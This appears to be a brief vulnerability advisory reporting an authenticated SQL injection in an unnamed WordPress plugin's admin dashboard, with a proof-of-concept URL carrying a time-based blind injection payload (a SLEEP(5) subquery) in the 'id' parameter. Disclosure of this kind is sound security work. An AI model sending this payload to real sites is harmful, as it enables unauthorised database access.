The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)